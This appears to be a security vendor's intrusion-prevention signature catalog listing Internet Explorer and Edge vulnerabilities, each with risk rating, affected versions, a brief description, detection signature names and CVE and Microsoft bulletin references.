Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to access sensitive information. This vulnerability has been widely used in the wild to spread malware.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure

References:

CVE-2016-3351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3351

MS16-104
http://technet.microsoft.com/security/bulletin/MS16-104

Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-829-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Internet Explorer and Microsoft Edge.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure

References:

CVE-2016-7195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7195

MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129

Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-838-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer and Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption

References:

CVE-2016-7202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202

MS16-144
http://technet.microsoft.com/security/bulletin/MS16-144

Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-841-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion

References:

CVE-2016-7287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7287

MS16-144
http://technet.microsoft.com/security/bulletin/MS16-144

Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-836-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a type confusion vulnerability in the scripting engines of Microsoft Edge and Internet Explorer. A remote attacker can use this to disclose information from or execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion

References:

CVE-2016-7241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7241

MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129

Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297

About this vulnerability:

An attempt to exploit a vulnerability in Internet Explorer detected

Risk:

High

First detected in:

sgpkg-ips-1794-5242

Last changed:

sgpkg-ips-1794-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer and Edge. This vulnerability is due to improper access of objects in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297

References:

CVE-2016-3297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3297

Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer

Type:

Input Validation

Description:

There has been reported an information disclosure vulnerability in Microsoft Internet Explorer and Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to information disclosure.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read

References:

CVE-2018-0891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0891

Microsoft-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS

About this vulnerability:

A vulnerability in Microsoft Groove Server

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer; Microsoft Sharepoint

Type:

Cross-site Scripting

Description:

A vulnerability exists in Microsoft Windows Internet Explorer and SharePoint Server products that may allow remote attackers to execute Cross Site Scripting attacks within a target system. The vulnerability is due to insufficient validation of HTML code. Remote attackers can exploit this vulnerability by enticing the target user to view a Web page containing crafted use of the Cascading Style Sheets (CSS) @import rule. Successful exploitation of this vulnerability could lead to information disclosure and execution of arbitrary script code within the context of the target system. Note: This vulnerability is different than the one identified by CVE-2010-1257.

Situation:

File-Text_MS-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS

References:

CVE-2010-3324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3324

MS10-072
http://technet.microsoft.com/security/bulletin/MS10-072

MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071

Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1036-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Microsoft SharePoint Services; Microsoft Office SharePoint Server 2007

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in Internet Explorer. With a successful attack, a remote attacker can leverage this to execute script on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure

References:

CVE-2010-3243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3243

BID-43703
http://www.securityfocus.com/bid/43703

MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071

Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows Vista; Windows XP; Windows 2003

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles certain property of a ANIMATEMOTION object. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Internet Explorer may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability

References:

CVE-2008-0077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0077

BID-27666
http://www.securityfocus.com/bid/27666

MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010

Microsoft-Internet-Explorer-Array-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-673-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0

Type:

Malfunction

Description:

A type confusion vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Array-Type-Confusion

References:

CVE-2015-2448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2448

MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079

Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-697-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure

References:

CVE-2015-6053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6053

MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106

Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-2421

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-ALSR-Bypass-CVE-2015-2421

References:

CVE-2015-2421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2421

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-489-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer's handling of objects during asynchronous processing. The vulnerability is due to the access of a deleted object. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted web page or MS Office document that uses the Internet Explorer rendering engine. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Text_Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption

References:

CVE-2012-2521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2521

OSVDB-84596
http://www.osvdb.org/84596

MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052

Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption

References:

CVE-2012-1524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1524

OSVDB-83652
http://www.osvdb.org/83652

MS12-044
http://technet.microsoft.com/security/bulletin/MS12-044

Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion

References:

CVE-2016-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0199

MS16-063
http://technet.microsoft.com/security/bulletin/MS16-063

Microsoft-Internet-Explorer-Body-Element-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Internet Explorer. An exploitation could lead to the crashing of the affected IE process.

Situation:

File-Text_Microsoft-Internet-Explorer-Body-Element-Use-After-Free

References:

CVE-2011-2000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2000

OSVDB-76212
http://www.osvdb.org/76212

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0;

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150

References:

CVE-2015-6150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6150

MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124

Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0

Type:

Input Validation

Description:

There is a denial of service vulnerability in Internet Explorer related to the BrowseDialog ActiveX control.

Situation:

File-Text_Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service

References:

CVE-2007-0371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0371

BID-22110
http://www.securityfocus.com/bid/22110

OSVDB-34647
http://www.osvdb.org/34647

Microsoft-Internet-Explorer-Cattrarray-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an object of type CStyleAttrArray being treated as an object of type CAttrArray while being freed. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Cattrarray-Type-Confusion

References:

CVE-2015-6142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6142

MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124

Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Cross-site Scripting

Description:

There exists a flaw in Microsoft Internet Explorer's security restriction implementation. A specially crafted Channel Definition Format (CDF) file can allow remote code execution in the "Local Machine" security zone. Successful exploitation of this vulnerability can allow for code execution with the privileges of the currently logged in user.

Situation:

File-TextId_Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting

References:

CVE-2005-0056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0056

BID-12437
http://www.securityfocus.com/bid/12437

MS05-014
http://technet.microsoft.com/security/bulletin/MS05-014

Microsoft-Internet-Explorer-CElement-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

Internet Explorer 9.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to a use-after-free error while handling <object> tags in HTML files. Remote attackers can exploit this vulnerability by enticing target users to open a malicious webpage, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario where arbitrary code is injected and executed on the target machine, the behavior of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally. A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error handling HTTP 30x server redirect responses that contain the CDL protocol.

Situation:

FTP_Oversized-Username
HTTP_SS-Microsoft-Internet-Explorer-CElement-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption-2

References:

CVE-2011-1256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1256

BID-48207
http://www.securityfocus.com/bid/48207

OSVDB-72948
http://www.osvdb.org/72948

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing

References:

CVE-2012-1523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1523

OSVDB-82860
http://www.osvdb.org/82860

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability

References:

CVE-2012-1538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1538

BID-56420
http://www.securityfocus.com/bid/56420

MS12-071
http://technet.microsoft.com/security/bulletin/MS12-071

Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-634-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an out-of-bounds write error in CGeneratedContent::UnWrapContent() that occurs when handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption

References:

CVE-2015-1622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1622

BID-72927
http://www.securityfocus.com/bid/72927

OSVDB-119347
http://www.osvdb.org/119347

MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018

Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused by a use-after-free error on a CGenericElement object when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption

References:

CVE-2013-1347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347

OSVDB-92993
http://www.osvdb.org/92993

MS13-038
http://technet.microsoft.com/security/bulletin/MS13-038

Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-CHTML-Use-After-Free-CVE-2013-0028

References:

CVE-2013-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0028

MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009

Microsoft-Internet-Explorer-Clipboard-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to insufficient access restriction to the clipboard of a user who visits a website. By enticing a target user to open a crafted web page, a remote attacker can exploit this vulnerability to access the data stored on the Windows clipboard.

Situation:

File-Text_Microsoft-Internet-Explorer-Clipboard-Information-Disclosure

References:

CVE-2014-6323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6323

OSVDB-114518
http://www.osvdb.org/114518

MS14-065
http://technet.microsoft.com/security/bulletin/MS14-065

Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-206-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer 7. An attempt to access an object that has been deleted can cause memory corruption. A remote attacker can exploit this vulnerability by enticing the target user to view a malicious HTML file, potentially leading to code execution in the context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit
File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit

References:

CVE-2009-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0075

BID-33627
http://www.securityfocus.com/bid/33627

OSVDB-51839
http://www.osvdb.org/51839

MS09-002
http://technet.microsoft.com/security/bulletin/MS09-002

Microsoft-Internet-Explorer-cloneNode-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-480-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-cloneNode-Use-After-Free

References:

CVE-2012-2557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2557

BID-55647
http://www.securityfocus.com/bid/55647

MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063

Microsoft-Internet-Explorer-Code-Execution-SA2757760

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-478-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760
File-Text_Microsoft-Internet-Explorer-Code-Execution-SA2757760-2

References:

CVE-2012-4969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969

MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063

Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-847-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Col-Element-Heap-Memory-Corruption

References:

CVE-2012-1876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876

OSVDB-82866
http://www.osvdb.org/82866

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow

About this vulnerability:

A Microsoft Internet Explorer Compressed Content URL Heap Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Microsoft Internet Explorer, in the processing of compressed data used with the HTTP 1.1 protocol, which allows remote attackers to cause a denial of service condition and possibly execute arbitrary code.

Situation:

HTTP_CSU-Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow

References:

CVE-2006-3873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3873

Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1036-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Copy-And-Paste-Information-Disclosure

References:

CVE-2012-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0010

BID-51931
http://www.securityfocus.com/bid/51931

OSVDB-79265
http://www.osvdb.org/79265

MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010

Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is caused by the dereferencing of a pointer after the corresponding memory has been released. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Cpastecommand-Use-After-Free

References:

CVE-2013-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0027

BID-57831
http://www.securityfocus.com/bid/57831

OSVDB-90124
http://www.osvdb.org/90124

MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009

Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
File-Text_Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting

References:

CVE-2008-3472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3472

BID-31615
http://www.securityfocus.com/bid/31615

MS08-058
http://technet.microsoft.com/security/bulletin/MS08-058

Microsoft-Internet-Explorer-Cross-Domain-Information-Disclosure-CVE-2010-3330

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-347-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330
File-Text_Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330

References:

CVE-2010-3330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3330

MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071

Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection

About this vulnerability:

A Microsoft Internet Explorer Cross-Domain JavaScript Injection vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-766-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Javascript Injection

Description:

A vulnerability in Microsoft Internet Explorer, versions 9 through 11, which allows remote attackers to bypass Same Origin Policy and inject arbitrary web script or HTML, which can result in sensitive information disclosure or possible further attacks.

Situation:

File-Text_Microsoft-Internet-Explorer-Cross-Domain-JavaScript-Injection

